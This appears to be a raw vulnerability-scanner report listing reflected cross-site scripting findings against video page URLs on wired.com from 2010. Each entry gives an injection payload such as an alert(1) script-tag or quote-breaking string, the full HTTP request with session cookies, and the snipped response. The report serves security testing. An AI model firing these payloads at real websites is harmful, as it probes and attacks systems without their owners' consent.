The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d7bf"-alert(1)-"d14a327ddc9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/18158166332d7bf"-alert(1)-"d14a327ddc9/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:45 GMT Date: Mon, 22 Nov 2010 00:42:45 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106780
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3eec1"-alert(1)-"be3d8efd9a6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally3eec1"-alert(1)-"be3d8efd9a6/656445394001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:56 GMT Date: Mon, 22 Nov 2010 00:42:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106773
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8b3e"-alert(1)-"f2dd299395f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001e8b3e"-alert(1)-"f2dd299395f HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:48:09 GMT Date: Mon, 22 Nov 2010 00:43:09 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106780
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d6bf"><a>d952bced43f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video6d6bf"><a>d952bced43f/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29421 Vary: Accept-Encoding Cache-Control: max-age=273 Expires: Mon, 22 Nov 2010 00:38:54 GMT Date: Mon, 22 Nov 2010 00:34:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video6d6bf"><a>d952bced43f ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 55abb--><script>alert(1)</script>39448b1449 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video55abb--><script>alert(1)</script>39448b1449/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29458 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:40:25 GMT Date: Mon, 22 Nov 2010 00:35:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video55abb--><script>alert(1)</script>39448b1449/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2eb87"><a>3c05f69f86c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos2eb87"><a>3c05f69f86c/latest/1815816633/cowboys-and-aliens-trailer/681412282001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:40:30 GMT Date: Mon, 22 Nov 2010 00:35:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106757
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos2eb87"><a>3c05f69f86c c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cb36"-alert(1)-"8e4a84dbfce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos6cb36"-alert(1)-"8e4a84dbfce/latest/1815816633/cowboys-and-aliens-trailer/681412282001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:38 GMT Date: Mon, 22 Nov 2010 00:36:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106781
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37ef3"><a>5441048f7e0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latest37ef3"><a>5441048f7e0/1815816633/cowboys-and-aliens-trailer/681412282001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:44 GMT Date: Mon, 22 Nov 2010 00:36:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106767
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latest37ef3"><a>5441048f7e0"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67547"-alert(1)-"25f8c3ce3fd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest67547"-alert(1)-"25f8c3ce3fd/1815816633/cowboys-and-aliens-trailer/681412282001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=271 Expires: Mon, 22 Nov 2010 00:42:11 GMT Date: Mon, 22 Nov 2010 00:37:40 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106771
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97411"-alert(1)-"560ba4b52d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/181581663397411"-alert(1)-"560ba4b52d/cowboys-and-aliens-trailer/681412282001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:55 GMT Date: Mon, 22 Nov 2010 00:37:55 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106727
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5709"-alert(1)-"f9b8b940f08 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/cowboys-and-aliens-trailera5709"-alert(1)-"f9b8b940f08/681412282001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:43:21 GMT Date: Mon, 22 Nov 2010 00:38:21 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106753
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26356"-alert(1)-"ad495767de was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/68141228200126356"-alert(1)-"ad495767de HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:43:30 GMT Date: Mon, 22 Nov 2010 00:38:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106772
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fa19"><a>84501b99538 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video8fa19"><a>84501b99538/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29448 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:42 GMT Date: Mon, 22 Nov 2010 00:39:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video8fa19"><a>84501b99538 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 2a912--><script>alert(1)</script>d33d36d23a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video2a912--><script>alert(1)</script>d33d36d23a9/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29487 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:45:35 GMT Date: Mon, 22 Nov 2010 00:40:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video2a912--><script>alert(1)</script>d33d36d23a9/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7290d"><a>06334098279 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos7290d"><a>06334098279/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=295 Expires: Mon, 22 Nov 2010 00:45:37 GMT Date: Mon, 22 Nov 2010 00:40:42 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106794
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos7290d"><a>06334098279 c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b46a9"-alert(1)-"65be922ee1d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videosb46a9"-alert(1)-"65be922ee1d/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:46:40 GMT Date: Mon, 22 Nov 2010 00:41:40 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106828
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... "text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f235"><a>b8db29e0880 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latest9f235"><a>b8db29e0880/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:46:44 GMT Date: Mon, 22 Nov 2010 00:41:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106784
